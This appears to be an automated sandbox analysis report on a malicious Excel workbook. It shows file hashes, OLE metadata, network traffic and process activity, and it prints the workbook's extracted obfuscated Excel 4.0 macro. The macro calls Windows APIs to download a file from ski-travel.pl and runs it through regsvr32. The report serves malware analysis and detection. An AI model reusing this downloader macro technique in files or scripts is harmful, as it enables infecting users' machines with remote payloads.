      SSDEEP:96:8y+/XLIkcPQh2y+/XLIkcPQh2y+/XLIkcPQh2y+/XLIkcPQ/:8NIkEQENIkEQENIkEQENIkEQ/
      MD5:C53C1BF991176EF8E90F153AD8E37F7E
      SHA1:11C2BFEB1437D65990B8089A99F40385FC54D453
      SHA-256:0C722E3597A26A1755E4746A37F5198E8AA440B848B86B3CB14EBF74BFCA0436
      SHA-512:C2FC82CFCE7B7554825607C698358DB414BCC92DD63AB0C8315E840F924513D16FD93313AFD9E01B78B0E86335C208FCEA5CC214FCA6BD78BFF893CDFFAA38C9
      Malicious:false
      Reputation:low
      Preview: L..................F.... .....+..{..`g].H.....f.H....*...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..,..}Q.a .DOCUME~1.XLS..Z.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.4.3.3.6.3.6.5.9...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\760639\Users.user\Desktop\document-143363659.xls.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.3.3.6.3.6.5.9...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......760639..........D_....3N...W..
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):225
      Entropy (8bit):4.757313547559536
      Encrypted:false
      SSDEEP:6:dj6Y9LabXVSELabXV6Y9LabXVSELabXV6Y9LabXVSELabXV6Y9LabXVy:dm1bXVSbXV61bXVSbXV61bXVSbXV61bc
      MD5:D9D785836017C7492C7D7B638AA0A837
      SHA1:B7197A598EC527ADF46028B7E7837EE182A351C0
      SHA-256:474E944E82BF60E74D36A829F7E550598DF72BB9B43028BD073A7B3EA1A40FAB
      SHA-512:ECFEBEC92CA86E10DF036C248EED082D5FEF228A822F06340D38E42465B0FA14DBEDB21F1C75AA2F31744CA7C1598E9A01C7188310D58CBE9305BD5A133B1B58
      Malicious:false
      Reputation:low
      Preview: Desktop.LNK=0..[xls]..document-143363659.LNK=0..document-143363659.LNK=0..[xls]..document-143363659.LNK=0..document-143363659.LNK=0..[xls]..document-143363659.LNK=0..document-143363659.LNK=0..[xls]..document-143363659.LNK=0..
      C:\Users\user\Desktop\40EE0000
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Applesoft BASIC program data, first line number 16
      Category:dropped
      Size (bytes):398457
      Entropy (8bit):7.195021317414189
      Encrypted:false
      SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdY:Kizo8RnsIROnr6n75YeN
      MD5:8100726759C974356BD81B61E1D28D29
      SHA1:5C98B9DCBDF40B9F44DA56ECBDCAF3A99ED95342
      SHA-256:21E15C241905871C61255ACDBAA61D146F1F67ED329FD0B0AF7FA2709E2F66C9
      SHA-512:5E668CC77069BA695330F8FE95ED32707542C387FBAD6C6F6419D36F26FD1D3880732320A583708DEA40D95142D88578E7B65943CB582E9645E4794B84783BBD
      Malicious:false
      Reputation:low
      Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:47:25 2020, Security: 0
      Entropy (8bit):7.5235433659273285
      TrID:
      • Microsoft Excel sheet (30009/1) 78.94%
      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
      File name:document-143363659.xls
      File size:338944
      MD5:74bdbc9d1413b77ee917072acb6804a1
      SHA1:b1434c7a2a4163c7b0d8837e00315dc3327d14a2
      SHA256:ea3fafe9a5e2771adb636314b23765e263e263d4e3ad3d2a3fc0a96a5f689be5
      SHA512:f5cc7475ca9da81cbecb5778cab384e62229c4cff8b6257b08ea6654ff0e952fa315f4b54ccd03b1caa52f54e4612bbbcfc98d6d1c5155875158ef2111c41651
      SSDEEP:6144:YcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTv:eizo8RnsIROnr6n75Yo
      File Content Preview:........................>......................................................................................................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "document-143363659.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:
      Last Saved By:
      Create Time:2006-09-16 00:00:00
      Last Saved Time:2020-11-26 09:47:25
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:917504

      Streams

      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:4096
      Entropy:0.367004077607
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:4096
      Entropy:0.256369457012
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326323
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:326323
      Entropy:7.65586744196
      Base64 Encoded:True
      Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
      Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

      Macro 4.0 Code

      CALL("Ke"&????2!IB343&"32", "Cr"&????2!ID371&"yA", "JCJ", ????2!HS341&????2!HS356, 0)
      
      CALL("U"&????2!ID361, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HS341&????2!HS356&????2!HS370, 0, 0)
      
      =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!IB343&""32"",""Cr""&????2!ID371&""yA"",""JCJ"",????2!HS341&????2!HS356,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      "=CALL(""Ke""&????2!IB343&""32"",""Cr""&????2!ID371&""yA"",""JCJ"",????2!HS341,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
      "=CALL(""U""&????2!ID361,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HS341&????2!HS356&????2!HS370,0,0)"=EXEC(????3!W36&????2!HS341&????2!HS356&????2!HS370)=HALT()

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Nov 29, 2020 04:12:56.848040104 CET4916780192.168.2.22194.181.228.60
      Nov 29, 2020 04:12:56.882638931 CET8049167194.181.228.60192.168.2.22
      Nov 29, 2020 04:12:56.882817984 CET4916780192.168.2.22194.181.228.60
      Nov 29, 2020 04:12:56.883970022 CET4916780192.168.2.22194.181.228.60
      Nov 29, 2020 04:12:56.918672085 CET8049167194.181.228.60192.168.2.22
      Nov 29, 2020 04:12:56.918900967 CET8049167194.181.228.60192.168.2.22
      Nov 29, 2020 04:12:56.918934107 CET8049167194.181.228.60192.168.2.22
      Nov 29, 2020 04:12:56.919054031 CET4916780192.168.2.22194.181.228.60
      Nov 29, 2020 04:12:56.919101954 CET4916780192.168.2.22194.181.228.60
      Nov 29, 2020 04:12:56.919991016 CET4916780192.168.2.22194.181.228.60
      Nov 29, 2020 04:12:56.920036077 CET4916780192.168.2.22194.181.228.60

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Nov 29, 2020 04:12:56.794611931 CET5219753192.168.2.228.8.8.8
      Nov 29, 2020 04:12:56.830497026 CET53521978.8.8.8192.168.2.22

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Nov 29, 2020 04:12:56.794611931 CET192.168.2.228.8.8.80xd372Standard query (0)ski-travel.plA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Nov 29, 2020 04:12:56.830497026 CET8.8.8.8192.168.2.220xd372No error (0)ski-travel.pl194.181.228.60A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • ski-travel.pl

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249167194.181.228.6080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Nov 29, 2020 04:12:56.883970022 CET0OUTGET /ds/231120.gif HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: ski-travel.pl
      Connection: Keep-Alive
      Nov 29, 2020 04:12:56.918900967 CET2INHTTP/1.1 404 Not Found
      Connection: Keep-Alive
      Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
      Pragma: no-cache
      Content-Type: text/html
      Content-Length: 1237
      Date: Sun, 29 Nov 2020 03:12:56 GMT
      Server: LiteSpeed
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that L
      Nov 29, 2020 04:12:56.918934107 CET2INData Raw: 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72
      Data Ascii: iteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:04:12:39
      Start date:29/11/2020
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f4e0000
      File size:27641504 bytes
      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:04:12:43
      Start date:29/11/2020
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
      Imagebase:0xff530000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      Code Analysis

      Reset < >